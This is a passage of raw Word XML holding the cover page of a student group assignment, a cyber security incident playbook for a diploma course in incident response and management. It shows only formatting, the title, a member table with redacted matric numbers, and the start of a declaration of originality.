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F3271D" w:rsidR="00E933E5" w:rsidP="00F3271D" w:rsidRDefault="0034137B" w14:paraId="7E1AA315" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:val="en-SG" w:eastAsia="en-SG"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DF867CA" wp14:editId="0DB26403">
            <wp:extent cx="2960370" cy="10902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60370" cy="1090295"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00F3271D" w:rsidR="00E933E5" w:rsidP="00F3271D" w:rsidRDefault="00F3271D" w14:paraId="5EEF5317" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>SCHOOL OF COMPUTING</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00881ABE" w:rsidP="00881ABE" w:rsidRDefault="00881ABE" w14:paraId="1E5379F1" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3271D" w:rsidP="004A516F" w:rsidRDefault="00F3271D" w14:paraId="0379CB33" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="5040"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="00F3271D" w14:paraId="7275234A" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3271D" w:rsidP="004A516F" w:rsidRDefault="00F3271D" w14:paraId="12D7BDD4" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="5040"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="000E2F9A" w:rsidP="004A516F" w:rsidRDefault="004A516F" w14:paraId="799A2FE0" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="5040"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00BD10CB" w:rsidP="001D70A9" w:rsidRDefault="00E355C1" w14:paraId="2B2B979E" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>DIPLOMA IN CYBERSECURITY</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00BD10CB" w:rsidP="001D70A9" w:rsidRDefault="00BD10CB" w14:paraId="426449F6" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="001D70A9" w:rsidP="001D70A9" w:rsidRDefault="00707D4C" w14:paraId="1C7639BC" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>INCIDENT RESPONSE AND MANAGEMENT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D70A9" w:rsidP="00E10905" w:rsidRDefault="001D70A9" w14:paraId="7E91B331" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F3271D" w:rsidP="00E10905" w:rsidRDefault="00F3271D" w14:paraId="36944D19" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00E10905" w:rsidRDefault="00F3271D" w14:paraId="725E79F1" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00E933E5" w:rsidP="00F3271D" w:rsidRDefault="00707D4C" w14:paraId="2D7905CB" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>CYBER SECURITY INCIDENT PLAYBOOK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00E10905" w:rsidRDefault="00F3271D" w14:paraId="16DFFE50" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:right="70"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblP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3"/>
        <w:gridCol w:w="1559"/>
        <w:gridCol w:w="3745"/>
        <w:gridCol w:w="2465"/>
      </w:tblGrid>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidTr="7F3C1250" w14:paraId="69EE582F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="00F3271D" w14:paraId="2A2BF411" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Practical Class Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="00F3271D" w14:paraId="733F0212" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Group Number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="00F3271D" w14:paraId="533F5AD5" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="00F3271D" w14:paraId="408C859B" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
              <w:t>Matric No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidTr="7F3C1250" w14:paraId="7A104A5E" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="423"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="7F3C1250" w14:paraId="77B9EAD9" w14:textId="09341373">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>[CLASS]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="7F3C1250" w14:paraId="327376A0" w14:textId="624A5CCA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="00F3271D" w:rsidP="00436E94" w:rsidRDefault="00436E94" w14:paraId="129AB244" w14:textId="6D145ECE">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="00F3271D" w:rsidP="00F3271D" w:rsidRDefault="00436E94" w14:paraId="53B5A1E2" w14:textId="7E997887">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidTr="7F3C1250" w14:paraId="544AB36F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="5E01EE3C" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="0B1D57D4" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="00436E94" w14:paraId="7FBF264B" w14:textId="2F8853C0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="00436E94" w14:paraId="632D19FC" w14:textId="06A034E8">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidTr="7F3C1250" w14:paraId="1965775A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="423"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="50D28FD3" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="38E47E13" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="30C57260" w14:textId="61F00C82">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="21C18DB1" w14:textId="5687D66A">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidTr="7F3C1250" w14:paraId="2B342C66" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="400"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="64A06613" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1559" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="004D5913" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="7878D172" w14:textId="77777777">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="36"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3745" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="4E080DDB" w14:textId="66205CC2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Member 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2465" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidRPr="00F3271D" w:rsidR="007965F1" w:rsidP="007965F1" w:rsidRDefault="007965F1" w14:paraId="260865C0" w14:textId="6A50E5DA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:right="70"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004F37B3" w:rsidP="009B53C6" w:rsidRDefault="0037416B" w14:paraId="5FB60C76" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="660900CD" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc160913379" w:id="0"/>
      <w:bookmarkStart w:name="_Toc160913412" w:id="1"/>
      <w:bookmarkStart w:name="_Toc162808621" w:id="2"/>
      <w:bookmarkStart w:name="_Toc220896675" w:id="3"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Declaration of Originality</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w:rsidRPr="000402B3" w:rsidR="000402B3" w:rsidP="000402B3" w:rsidRDefault="000402B3" w14:paraId="0270B4EF" w14:textId="77777777">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
